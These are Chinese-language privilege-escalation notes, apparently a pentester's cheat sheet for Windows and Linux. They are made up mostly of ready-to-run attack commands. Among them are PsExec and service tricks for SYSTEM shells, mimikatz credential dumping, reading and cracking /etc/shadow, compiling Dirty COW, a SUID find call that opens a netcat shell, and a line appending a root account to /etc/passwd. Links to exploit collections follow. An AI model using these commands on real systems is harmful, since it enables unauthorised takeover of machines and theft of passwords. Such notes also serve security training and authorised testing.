计算机常见的权限:
常见提权方面
查看服务pid号
tasklist /svc | find “Termservice”
netstat -ano| find “1488”
wmic os get caption:查看系统名
wmic qfe get Description,HstFixID,InstalledOn:查看补丁信息
wmic product get name , version :查看系统安装程序
linux提权命令详解
手法
密码结构
用户名:RID:LM-HASH值:NT-HASH值
https://www.cmd5.com/ HASH破解
密码获取
密码破解 :
用户信息 :
/etc/passwd
root : x : 0 : 0 : root : /root : /bin/bash
密码信息:/etc/shadow
linux常用加密方法:
密码破解 : john工具
密码收集:
常见window权限:
普通用户:user
管理员:administrator
系统:system
admin->system
PsExec.exe -i -s cmd
弹出一个system权限终端
利用此方法将整个桌面提升至system权限
用系统权限开启任务管理器,利用任务管理器开启桌面进程
win03,xp
at 22:22 /interactive cmd (win03,xp)
同样到时间会弹出system权限终端
win7
sc Create name binPath= "cmd /k start" type= own type= interact
sc start name (win 7)
pinjector.exe l 查看进程pid
pinjector.exe -p pid cmd port
nc -nv ip port
先查看进程pid
或者任务管理器
找到services.exe的pid
kali工具:usr/share/windows-binaries/fgdump
kali工具:/usr/share/windows-resources/mimikatz
简单使用
::(help)
privilege::debug(提权)
sekurlsa::logonPasswords(账号密码)
process(进程)
service(服务)
reg query HKEY_LOCAL_MACHINE\SECURITY\CACHE
方法
linux分析工具 : Linux Exploit Suggester
权限:
原理
替换/etc/passwd文件下的root用户为firefart
编译
gcc dirtycow.c -pthread -o dirtycow -lcrpty
suid提权:以文件拥有者身份执行命令
查找具有root权限的suid文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
执行命令
touch filename
find filename -exec whoami \;
反弹root终端
find filename -exec nc -lvp 1234 -e /bin/sh \;
nc -nv 192.168.238.158 1234
perl -le ‘print crypt('pass','aa')’
将用户名密码追加到passwd下
echo 'abcd:aaW3cJZ7OSoQM:0:0:dirty:/root:/bin/bash '>> /etc/passwd
一些普通用户在sudo组中可以直接
su sudo user 提权
cat /etc/issue
searchsploit ubuntu 12.04
etc/crontab文件用于配置生成一个定时任务。当用户对此文件更改时,可以利用添加任务修改bin/sh的执行权限以达到提权目的
https://www.exploit-db.com/ 漏洞库
https://github.com/SecWiki/windows-kernel-exploits windows提权漏洞集合
https://github.com/SecWiki/linux-kernel-exploits linux提权漏洞集合
https://github.com/SecWiki/macos-kernel-exploits macos提权漏洞集合